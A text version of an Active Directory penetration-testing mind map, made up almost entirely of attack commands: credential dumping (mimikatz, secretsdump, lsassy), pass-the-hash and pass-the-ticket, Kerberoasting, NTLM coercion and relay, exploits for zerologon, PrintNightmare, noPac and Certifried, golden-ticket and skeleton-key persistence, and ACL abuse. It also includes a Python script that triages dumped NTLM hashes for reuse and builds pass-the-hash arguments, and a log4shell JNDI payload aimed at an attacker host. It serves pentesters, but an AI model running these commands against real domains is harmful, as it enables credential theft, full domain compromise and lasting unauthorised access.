Ad Map

Lateral move

WSUS / SCCM
  - WSUSpendu.ps1  # needs a compromised WSUS server
  - WSUSpect server
  - SCCM admin abuse (Administrator access): CMPivot, PowerSCCM, SharpSCCM

MSSQL
  - find MSSQL access: cme mssql <ip> -u <user> -p <password> -d <domain>
  - users with SQLAdmin (BloodHound): MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p
  - xp_cmdshell (Low Access): EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell '<cmd>'
  - MSSQL trust link: Get-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance> -Query "<query>"
  - use exploit/windows/mssql/mssql_linkcrawler
  - mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>  (pr #1397)
      enum_db
      enable_xp_cmdshell ; xp_cmdshell <cmd>  (Low Access)
      enum_impersonate ; exec_as_user <user> ; exec_as_login <login>
      xp_dir_tree <ip>  (coerce SMB ->)
      sp_linkedservers ; use_link  (trust link)

Valid credentials

Users (get all users)
  - GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username>
  - cme smb <ip> -u <user> -p '<password>' --users
  - ldeep ldap -u <user> -p '<password>' -d <domain> -s ldap://<dc_ip> users
Local user (Administrator access)
  - cme smb -u <user> -p '<pass>' <ip> --local-auth
  - impacket-like tools: give the cleartext password without the domain/ prefix
Password spray with the credentials
  - crackmapexec smb <ip_range> -u <user> -p <password> -d <domain>
  - crackmapexec smb <ip_range> -u <user> -p <password> --local-auth

Lateral move with a cleartext password
  - psexec.py <domain>/<user>:<password>@<ip>  (NT AUTHORITY\SYSTEM)
  - psexec.exe -AcceptEULA \\<ip>  (interactive shell)
  - mimikatz "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"
  - atexec.py <domain>/<user>:<password>@<ip> "command"  (NT AUTHORITY\SYSTEM)
  - smbexec.py <domain>/<user>:<password>@<ip>  (Administrator access)
  - wmiexec.py <domain>/<user>:<password>@<ip>
  - dcomexec.py <domain>/<user>:<password>@<ip>  (pseudo-shell: file write and read)
  - enumerate SMB shares: cme smb <ip> -u <user> -p <password> --shares
  - exploit an SMB share, drop a .url file (coerce SMB ->): cme smb <ip> -u <user> -p <password> -M slinky -o NAME=<filename> SERVER=<ip>
  - WinRM: evil-winrm -i <ip> -u <user> -p <password>  (low access / high access)
  - RDP: xfreerdp /u:<user> /d:<domain> /p:<password> /v:<ip>

Domain enumeration
  - bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all
  - ./rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile> -z
  - import-module sharphound.ps1; invoke-bloodhound -collectionmethod all -domain <domain>
  - sharphound.exe -c all -d <domain>
  - ldeep ldap -u <user> -p '<password>' -d <domain> -s ldap://<dc_ip> all <backup_folder>
  - PowerView / SharpView ; adPEAS ; PingCastle
  -> 🔥 BloodHound: ACL, Delegation, Users, cleartext passwords
Got an account on the domain: authenticated (cleartext pass / Kerberos / NTLM)

  - SMB (search files): smbclient.py <domain>/<user>:<password>@<ip>
  - MSSQL: crackmapexec mssql <ip_range> -u <user> -p <password> ; mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>

🔥 Kerberoasting
  - Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName
  - get kerberoastable users (BloodHound): MATCH (u:User {hasspn:true}) RETURN u
  - MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
  - GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
  - Rubeus kerberoast
  -> hash found (TGS) -> Crack Hash

Enum DNS: dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query <dc_ip>  -> Scan network
Enumerate AD CS: 🔥 certipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>  -> ADCS
Enumerate Azure AD Connect (find the AAD Connect server from the MSOL_ account description): cme ldap <ip> -u <user> -p <password> -M get-desc-users | grep -i MSOL

WebDAV
  - find: cme smb <ip> -u <user> -p <password> -M webdav
  - start WebDAV with a Documents.searchConnector-ms file: cme smb <ip> -u '<user>' -p '<pass>' -M drop-sc
  - add the attacker computer in DNS: dnstool.py -u '<domain>\<user>' -p '<pass>' --record '<attack_name>' --action add --data <ip_listen> <dc_ip>
  - coerce with <attacker_hostname>@80/something as target  -> Coerce HTTP ->

🔥 Pass the hash (PTH)
  - psexec.py -hashes ":<hash>" <user>@<ip>  (NT AUTHORITY\SYSTEM)
  - psexec.exe -AcceptEULA \\<ip>  (interactive shell)
  - mimikatz "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"
  - atexec.py -hashes ":<hash>" <user>@<ip> "command"  (NT AUTHORITY\SYSTEM)
  - smbexec.py -hashes ":<hash>" <user>@<ip>  (Administrator access)
  - wmiexec.py -hashes ":<hash>" <user>@<ip>
  - dcomexec.py -hashes ":<hash>" <user>@<ip>  (pseudo-shell: file write and read)
  - crackmapexec smb <ip_range> -u <user> -d <domain> -H ':<hash>'
  - crackmapexec smb <ip_range> -u <user> -H ':<hash>' --local-auth
  - WinRM: evil-winrm -i <ip> -u <user> -H <hash>  (low access / high access)
  - RDP: xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>  (Restricted Admin mode must be enabled on the target: reg.py <domain>/<user>@<ip> -hashes ':<hash>' add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0')
  - SMB (search files): smbclient.py -hashes ":<hash>" <user>@<ip>
  - MSSQL: crackmapexec mssql <ip_range> -H ':<hash>' ; mssqlclient.py -windows-auth -hashes ":<hash>" <domain>/<user>@<ip>

Coerce
  - Coerce RDP
  - rpcdump.py <domain>/<user>:<password>@<domain_server> | grep MS-RPRN
  - printerbug.py '<domain>/<username>:<password>'@<Printer IP> <listener_ip>
  - PetitPotam.py -d <domain> -u <user> -p <password> <listener_ip> <target_ip>
  - 🔥 coercer.py -u <user> -d <domain> -p <password> -t <target> -l <attacker_ip>
  -> Coerce SMB -> NetNTLM hash (crack or relay)
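The pass-the-hash branch above starts from hash lines that secretsdump.py, cme --sam or cme --ntds print. The following is an added example, not part of the original mind map: it parses those "domain\user:rid:lmhash:nthash:::" lines, drops accounts whose NT hash is the empty-password hash (pass-the-hash with it goes nowhere), groups accounts that share an NT hash (password reuse, the usual lateral-move pivot) and builds the ":<nthash>" argument that impacket's -hashes and crackmapexec's -H expect. The sample dump is constructed for the example; the account names and the third NT hash are invented.

```python
"""Triage secretsdump-style NTLM hash lines before pass-the-hash (added example)."""
import re
from collections import defaultdict

# NT hash of the empty string: such an account has no usable password for PTH.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash of the empty string: what modern dumps show when LM hashing is off.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# secretsdump / cme line shape: [domain\]user:rid:lmhash:nthash:::
_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump(text):
    """Return one dict per well-formed hash line; status lines are skipped."""
    entries = []
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue  # "[*] Dumping ..." headers and anything else
        d = m.groupdict()
        entries.append({
            "domain": d["domain"], "user": d["user"], "rid": int(d["rid"]),
            "lm": d["lm"].lower(), "nt": d["nt"].lower(),
        })
    return entries


def usable(entry):
    """False for accounts with the empty-password NT hash."""
    return entry["nt"] != EMPTY_NT


def reuse_groups(entries):
    """Map each NT hash to the accounts sharing it (only hashes seen 2+ times)."""
    by_hash = defaultdict(list)
    for e in filter(usable, entries):
        by_hash[e["nt"]].append(e["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def pth_arg(entry):
    """Value for impacket's -hashes / crackmapexec's -H: empty LM part, NT hash."""
    return ":" + entry["nt"]


def lm_present(entry):
    """A non-empty LM hash means LM hashing is still on: crack it first (hashcat -m 3000)."""
    return entry["lm"] != EMPTY_LM


# Constructed sample output. The two repeated NT hashes are the well-known hashes
# of "password" and of the empty string; jdoe's hashes are arbitrary values.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
CORP\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
CORP\\jdoe:1106:299bd128c1101fd6aad3b435b51404ee:2b2ac2d1c7c8fda6cea80b5fad7563aa:::
"""

if __name__ == "__main__":
    entries = parse_dump(SAMPLE)
    for h, users in reuse_groups(entries).items():
        print(f"shared NT hash {h}: {', '.join(users)} -> try -hashes ':{h}' on every host")
    for e in entries:
        if lm_present(e):
            print(f"{e['user']}: LM hash present ({e['lm']}), crack it with hashcat -m 3000")
```

Accounts that share a hash across the local SAM and the domain (here the local Administrator and svc_backup) are the ones worth spraying with crackmapexec -H over the whole range.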
Privilege escalation
  - Get AppLocker info: Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe  (dll/msi/...)
  - winpeas.exe  -> known vulnerabilities, exploit!
  - AMSI bypass: https://amsi.fail/ ; reflection method ; patching amsi.dll
  - search password files: findstr /si 'password' *.txt *.xml *.docx  -> cleartext pass (user account)
  - AppLocker (whitelisting) bypass: use C:\Windows\Tasks ; use C:\Windows\Temp ; installutil.exe /logfile= /LogToConsole=false /U C:\runme.exe ; mshta.exe my.hta ; MSBuild ; PowerShell CLM bypass  (Low access, without AppLocker)
  - User Account Control (UAC) bypass: FodHelper ; WSReset ; MSDT
  - Known vulnerabilities: SMBGhost CVE-2020-0796 ; CVE-2021-36934 (HiveNightmare/SeriousSAM)
  - Service account (IIS/MSSQL) with SeImpersonatePrivilege: RoguePotato ; Juicy Potato / Lovely Potato ; 🔥 PrintSpoofer  -> Admin access
  - CertPotato: certipy req -k -ca <ca> -template Machine -target <dc> ; certipy auth -pfx <pfxfile>  -> Machine NT hash -> silver ticket: ticketer.py -nthash <hash> -domain-sid <domain_sid> -domain <domain> -spn cifs/<dc> <targetUser>
      ./Rubeus tgtdeleg /nowrap  -> TGT (pass the ticket)
      shadow credentials: certipy shadow auto -u '<machine>$'@<domain> -k -account '<machine$>'
  - 🔥 KrbRelayUp: .\KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computer$> -ComputerPassword <password> ; ./KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name> -cp <computer_pass>
  -> connect to the computer: Lateral move (Administrator access)

Pass the ticket (ccache / kirbi)
  - Rubeus ptt /ticket:<ticket> ; Rubeus.exe ptt /ticket:<ticket>
  - Rubeus createnetonly /program:C:\Windows\System32\[cmd.exe||upnpcont.exe] ; Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
  - mimikatz kerberos::ptc "<ticket>"
  - convert format: ticketConverter.py <kirbi||ccache> <ccache||kirbi>
  - export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache ; impacket tools: same as pass the hash but use -k and -no-pass
  - modify the SPN: tgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice "<service>/<target>"  #pr 1256
  - proxychains secretsdump -k '<domain>'/'<user>'@'<ip>'  (see DCSync)
  -> Low access / Administrator access

Overpass the hash / pass the key (PTK)
  - Rubeus asktgt /user:victim /rc4:<rc4value>
  - getTGT.py <domain>/<user> -hashes :<hashes>
  - getTGT.py -aesKey '<key>' <domain>/<user>@<ip>
  - impacket tools: same as pass the hash but use -aesKey (and use the FQDN)
  - proxychains secretsdump -aesKey <key> '<domain>'/'<user>'@'<ip>'  (see DCSync)

Socks (with NTLM relay)
  - proxychains lookupsid.py <domain>/<user>@<ip> -no-pass -domain-sids  (Users)
  - proxychains mssqlclient.py -windows-auth <domain>/<user>@<ip> -no-pass  (MSSQL)
  - proxychains secretsdump -no-pass '<domain>'/'<user>'@'<ip>'  (see DCSync)
  - proxychains atexec.py -no-pass <domain>/<user>@<ip> "command"  (NT AUTHORITY\SYSTEM)
  - proxychains smbexec.py -no-pass <domain>/<user>@<ip>  (Administrator access)
  - proxychains smbclient.py -no-pass <user>@<ip>  (search files)

Pass the certificate (certificate .pfx)
  - get the NTLM hash from the certificate: certipy auth -pfx <crt_file> -dc-ip <dc_ip>  -> NTLM hash
  - PKINIT: gettgtpkinit.py -cert-pfx "<pfx_file>" [-pfx-pass "<cert-password>"] "<fqdn_domain>/<user>" "<tgt_ccache_file>"  -> pass the ticket
  - Rubeus.exe asktgt /user:"<username>" /certificate:"<pfx_file>" [/password:"<certificate_password>"] /domain:"<fqdn-domain>" /dc:"<dc>" /show
  - Schannel: certipy auth -pfx <crt_file> -ldap-shell  -> add_computer, set_rbcd (RBCD)

Extract credentials from LSASS (got administrator access on one machine)
  - mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
  - procdump.exe -accepteula -ma lsass.exe lsass.dmp ; mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
  - LSASS as a Protected Process: PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp ; mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-"  # with mimidriver.sys
Extract credentials from LSASS (remote)
  - Metasploit: load kiwi ; creds_all
  - cme smb <ip_range> -u <user> -p <password> -M lsassy
  - 🔥 lsassy -d <domain> -u <user> -p <password> <ip>
  -> User + Pass (cleartext pass in some cases), NTLM hashes, dom admin  -> Lateral move (PTH/PTK)

Trust relationship / Forest to Forest
  - nltest.exe /trusted_domains
  - ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
  - Get-DomainTrust -Domain <domain> ; Get-DomainTrustMapping
  - ldeep ldap -u <user> -p '<password>' -d <domain> -s ldap://<dc_ip> trusts
  - get SIDs: rpcclient $> lookupnames <name> ; wmic useraccount get name,sid

Known vulnerabilities
  - MS14-068: FindSMB2UPTime.py <ip> ; auxiliary/admin/kerberos/ms14_068_kerberos_checksum ; goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>  -> Pass the ticket -> dom admin
  - privexchange (CVE-2019-0724, CVE-2019-0686): python privexchange.py -ah <attacker_host_or_ip> <exchange_host> -u <user> -d <domain> -p <password>  -> Coerce HTTP -> dom admin
  - 🔥 SamAccountName / noPac (CVE-2021-42287 / CVE-2021-42278)
      scan: cme smb <ip> -u <user> -p <password> -M nopac
      .\noPac.exe -domain <domain> -user <user> -pass <pass> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_pass> /service cifs /ptt
      with impacket: addcomputer.py / addspn.py / renameMachine.py / getTGT.py / renameMachine.py / getST.py
      -> Pass the ticket -> DCSync -> DOM ADMIN (then delete the computer account)
  - 🔥 PrintNightmare (CVE-2021-1675 / CVE-2021-34527): CVE-2021-1675.py <domain>/<user>:<password>@<target> '\\<smb_server_ip>\<share>\inject.dll'  -> Admin
  - 🔥 Certifried (CVE-2022-26923, needs ADCS)
      certipy account create -u <user>@<domain> -p '<password>' -user 'certifriedpc' -pass 'certifriedpass' -dns '<fqdn_dc>'
      certipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template Machine
      certipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip>
      -> Pass the ticket -> DCSync -> DOM ADMIN (then delete the computer account)

Extract credentials from SAM (Administrator access)
  - reg save HKLM\SAM <file>; reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file> ; secretsdump.py -system SYSTEM -sam SAM LOCAL
  - shadow copies: diskshadow list shadows all ; mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
  - mimikatz "privilege::debug" "lsadump::sam" "exit"
  - 🔥 secretsdump.py <domain>/<user>:<password>@<ip>
  - reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share' ; secretsdump.py -sam <sam_file> -system <system_file> LOCAL
  - cme smb <ip_range> -u <user> -p '<password>' --sam
  -> NTLM hashes -> Lateral move (PTH)

Extract credentials from LSA (Administrator access)
  - cme smb <ip_range> -u <user> -p '<password>' --lsa  -> cached domain logon (MsCache 2), machine account, service account
  - 🔥 secretsdump.py <domain>/<user>:<password>@<ip>
  - reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share' ; secretsdump.py -security <security_file> -system <system_file> LOCAL
  -> User + Pass

DPAPI extract
  - 🔥 DonPAPI.py <domain>/<user>:<password>@<target>
  - mimikatz.exe "sekurlsa::dpapi"
  -> User + Pass

Search stored passwords
  - search password files: findstr /si 'password' *.txt *.xml *.docx
  - lazagne.exe all
  - Chrome: %appdata%\Local\Google\Chrome\User Data\Default ; SharpChromium.exe
  -> lateral move (cleartext pass) ; password reuse -> lateral move (creds/pth/...)

Token manipulation (Admin)
  - .\incognito.exe list_tokens -u ; .\incognito.exe execute -c "<domain>\<user>" powershell.exe
  - Metasploit: use incognito ; impersonate_token <domain>\\<user>
  - irs.exe list ; irs.exe exec --pid <pid> --command <command>
  -> impersonate -> Domain Admin

Golden ticket
  - DCSync the krbtgt: mimikatz lsadump::dcsync /domain:<domain> /user:<domain>\krbtgt
  - Get-DomainSID -Domain <domain>
  - mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-519 /ptt

Child domain to forest compromise - extra SIDs (parent/child)
  - Get-DomainSID -Domain <domain> ; Get-DomainSID -Domain <target_domain> ; lookupsid.py -domain-sids <domain>/<user>:'<password>'@<dc_ip> 0
  - ticketer.py -nthash <child_krbtgt_hash> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_domain_sid>-519 goldenuser
  - raiseChild.py <domain>/<user>:'<password>'
  -> Pass the ticket -> DCSYNC -> DOM ADMIN

Inter-realm ticket / TRUST (parent/child)
  - mimikatz lsadump::trust /patch
  - mimikatz kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<trust_key_aes256> /sids:<target_domain_sid>-519 /service:krbtgt /target:<target_domain> /ptt
  - ticketer.py -nthash <trust_key> -domain-sid <child_sid> -domain <child_domain> -extra-sid <parent_domain_sid>-519 -spn krbtgt/<parent_domain> goldenuser
  - getST.py -k -no-pass -spn cifs/<dc_fqdn> <parent_domain>/trustfakeuser@<parent_domain> -debug
  -> Pass the ticket -> DCSYNC -> DOM ADMIN

Breaking forest trust
  - Unconstrained delegation: use printerbug or petitpotam to force the DC of the external forest to connect to a local unconstrained delegation machine; capture the TGT, inject it into memory and DCSync
  - users with foreign domain group membership: MATCH p=(n:User)-[:MemberOf]->(m:Group) WHERE n.domain="<domain>" AND m.domain<>n.domain RETURN p
  - groups with foreign domain group membership: MATCH p=(n:Group {domain:"<domain>"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain AND n.name<>m.name RETURN p
  - Get-DomainForeignGroupMember -Domain <target> ; convertfrom-sid <sid>
  -> user on both domains -> ACL

Forest to forest - extra SID (SID History / TREAT_AS_EXTERNAL)  (SID filtering: find a group with a RID > 1000)
  - Get-DomainSID -Domain <domain> ; Get-DomainSID -Domain <target_domain> ; Get-DomainGroupMember -Identity "<group>" -Domain <target_domain>
  - mimikatz kerberos::golden /user:Administrator /krbtgt:<HASH_KRBTGT> /domain:<domain> /sid:<user_sid> /sids:<RootDomainSID>-<GROUP_SID_SUP_1000> /ptt
  - ticketer.py -nthash <krbtgt_hash> -domain-sid <from_sid> -domain <from_domain> -extra-sid <to_domain>-<group_id> goldenuser  //(group id must be > 1000)
  - trust ticket (NT hash of TARGET_DOMAIN$ from the ntds): ticketer.py -nthash <trust_key> -domain-sid <from_domain_sid> -domain <from_domain> -extra-sid <to_domain>-<group_id> -spn krbtgt/<to_domain> trustuser  //(group id must be > 1000) ; getST.py -k -no-pass -spn cifs/<dc_fqdn> <parent_domain>/trustfakeuser@<parent_domain> -debug
  -> Pass the ticket -> Lateral move PTH -> Domain Admin

Extract credentials with certificate authentication (ADCS required): masky -d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip>  -> pfx / NT hash / ccache -> Pass the certificate / Pass the ticket / Lateral move

Forest to forest compromise - MSSQL trusted links
  - Get-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance>
  - mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>  (pr #1397) -> sp_linkedservers ; use_link (trust link)

Classic quick compromise methods
  - zerologon (CVE-2020-1472) (unsafe): zerologon-scan '<dc_netbios_name>' '<ip>' ; python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip> ; secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator" ; secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP> ; restore the machine password: python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>  -> Domain Admin
  - Eternal Blue MS17-010 (no credentials): exploit/windows/smb/ms17_010_eternalblue
  - SYSVOL & GPP MS14-025: use scanner/smb/smb_enum_gpp ; findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml  -> User + Pass
  - tomcat/jboss manager: auxiliary/scanner/http/tomcat_enum ; exploit/multi/http/tomcat_mgr_deploy
  - java rmi: exploit/multi/misc/java_rmi_server
  - java serialized port: ysoserial
  - vulnerable product with a CVE: searchsploit
  - proxylogon ; proxyshell
  - log4shell: ${jndi:ldap://<ip>:<port>/o=reference} ; rogueJndi-1.0.jar
  - impersonate an RDP session (lateral move RDP): psexec -s -i cmd ; query user ; cmd /k tscon <id> /dest:console
  - database credentials: use admin/mssql/mssql_enum_sql_logins  -> MSSQL connection
  - Hybrid environment (Azure AD Connect): azuread_decrypt_msol_v2.ps1 (dump the cleartext password of the MSOL account on the AAD Connect server) ; cme smb <ip> -u <user> -p <password> -M msol  -> DCSync

Scan network
  - cme smb <ip_range>  # enumerate smb hosts
  - nmap -sP -p <ip>  # ping scan
  - nmap -PN -sV --top-ports 50 --open <ip>  # quick scan
  - nmap -PN --script smb-vuln* -p139,445 <ip>  # search smb vuln
  - nmap -PN -sC -sV -oA <output> <ip>  # classic scan
  - nmap -PN -sC -sV -p- -oA <output> <ip>  # full scan
  - nmap -sU -sC -sV -oA <output> <ip>  # udp scan
  -> low hanging fruit / find vulnerable host
  - nmcli dev show eth0  # show domain name & dns
  - find the DC IP: nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain> ...

Pentesting Active Directory - entry point (no credentials)
  - zone transfer: dig axfr <domain_name> @<name_server>
  - enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
  - smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>
  - list guest access on SMB shares: smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
  - cme smb <ip> -u '' -p ''  # enumerate null session
  - cme smb <ip> -u 'a' -p ''  # enumerate anonymous access
  - enumerate LDAP: nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip> ; ldapsearch -x -h <ip> -s base
  -> got a username but no password

Find user list
  - enum4linux -U <dc-ip> | grep 'user:'
  - cme smb <ip> --users
  - net rpc group members 'Domain Users' -W '<domain>' -I '<ip>' -U '%'
  - nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
  - OSINT: enumerate usernames on the internet
  -> user found

Get password policy (needs creds, but get the policy before starting a spray)
  - cme <IP> -u 'user' -p 'password' --pass-pol
  - enum4linux -u 'username' -p 'password' -P <IP>
  - Get-ADDefaultDomainPasswordPolicy ; Get-ADFineGrainedPasswordPolicy -filter * ; Get-ADUserResultantPasswordPolicy -Identity <user>  (FGPP)
  - ldapsearch-ad.py --server '<dc>' -d <domain> -u <user> -p <pass> --type pass-pols

🔥 Password spray
  - cme smb <dc-ip> -u user.txt -p password.txt --no-bruteforce  # test user=password
  - cme smb <dc-ip> -u user.txt -p password.txt  # multiple tests (careful with the lockout policy)
  - sprayhound -U <users.txt> -d <domain> -dc <dcip>
  -> cleartext credentials found

🔥 Poisoning
  - LLMNR / NBT-NS / mDNS: responder -I eth0 (use --lm to force an LM downgrade)  # disable smb & http if relaying
  - IPv6 preferred to IPv4: mitm6 -d <domain>
  - ARP poisoning: bettercap
  -> Poisoning SMB -> / HTTP ->

Got valid username
  - properties: SamAccountName can change
ASREPRoast
  - get ASREPRoastable users (need creds): Get-DomainUser -PreauthNotRequired
  - MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
  - python GetNPUsers.py <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>
  - Rubeus.exe asreproast /format:hashcat
  -> hash found (ASREP) -> Crack Hash
  - Blind Kerberoasting: Rubeus.exe kerberoast /domain:<domain> /dc:<dcip> /nopreauth:<asrep_user> /spns:<users.txt> ; GetUserSPNs.py -no-preauth "<asrep_user>" -usersfile "<user_list.txt>" -dc-host "<dc_ip>" "<domain>"/  -> hash found (TGS)
  - CVE-2022-33679: python3 CVE-2022-33679.py <domain>/<user> <target>
Coerce, unauthenticated PetitPotam (CVE-2022-26925): PetitPotam.py -d <domain> <listener_ip> <target_ip>  -> coerce SMB ->

Persistence
  - Domain admin: net group "domain admins" myuser /add /domain ; is enterprise admin?
  - Golden ticket (Enterprise Admin): ticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser> ; mimikatz "kerberos::golden /user:<admin_user> /domain:<domain> /sid:<domain-sid> /aes256:<krbtgt_aes256> /ptt"
  - Silver ticket: mimikatz "kerberos::golden /sid:<current_user_sid> /domain:<domain-sid> /target:<target_server> /service:<target_service> /aes256:<computer_aes256_key> /user:<any_user> /ptt" ; ticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser>
  - Diamond ticket ; Sapphire ticket
  - Directory Service Restore Mode (DSRM): PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
  - Skeleton Key (the password is mimikatz): mimikatz "privilege::debug" "misc::skeleton" "exit"
  - Custom SSP: mimikatz "privilege::debug" "misc::memssp" "exit"  -> C:\Windows\System32\kiwissp.log
  - Golden certificate: certipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash> ; certipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject 'CN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL>'
  - DC shadow
  - DPAPI backup key: dpapi.py backupkeys -hashes ':<hash>' -t Administrator@<dc_ip> --export ; DonPAPI -pvk <domain_backupkey.pvk> -H ':<hash>' <domain>/<user>@<ip_range>  # note: dpapi.py != DonPAPI
  - certsync -u <user> -p <password> -d <domain> -dc-ip <dcip> -ns <nsip>
  - Permissions / ACL -> move

Domain Admin -> DCSync
  - mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator
  - secretsdump.py '<domain>/<user>:<pass>'@<ip>
  - secretsdump '<domain>'/'<user>':'<password>'@'<domain_controller>'
  - cme smb <dcip> -u <user> -p <password> -d <domain> --ntds
  - 🔥 dump ntds.dit: ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q ; secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract ; windows/gather/credentials/domain_hashdump
  -> Crack Hash / Lateral move

Shadow Credentials (needs ADCS; Generic Write on msDS-KeyCredentialLink)
  - certipy shadow auto -u <user>@<domain> -p <password> -account '<target_account>'
  - Whisker.exe
  - pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
  -> Pass the Certificate

GG, good luck for the report!

ACL manipulation
  - Self (Self-Membership) on Group: net group "<group>" <myuser> /add /domain
  - GenericAll / WriteProperty on Group -> add group member: ldeep ldap -u <user> -p <pwd> -d <domain> -s ldap://<dc> add_to_group "CN=<user>,DC=<domain>" "CN=<group>,DC=<domain>"
  - On Group: WriteProperty (Self-Membership)
  - WriteDACL + WriteOwner
  - WriteOwner on Group -> give yourself GenericAll: owneredit.py ; dacledit.py
  - On Computer: GenericAll / GenericWrite -> msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) -> Lateral move (PTT) ; add Key Credentials (shadow credentials)
  - On User: GenericAll / GenericWrite
      change password: net user <user> <password> /domain  -> user with cleartext pass
      add SPN (targeted Kerberoasting): targetedKerberoast.py -d <domain> -u <user> -p <pass>  -> hash found (TGS) -> cracking hash
      add Key Credentials (shadow credentials)
      logon script  -> Access
  - ForceChangePassword: net user <user> <password> /domain ; net rpc password <user> <password> -S <dc_fqdn>  -> user with cleartext pass
  - ACLs/ACEs permissions: aclpwn.py ; acltoolkit <domain>/<user>:'<password>@<target> get-objectacl [-all | -object <object>]

LAPS
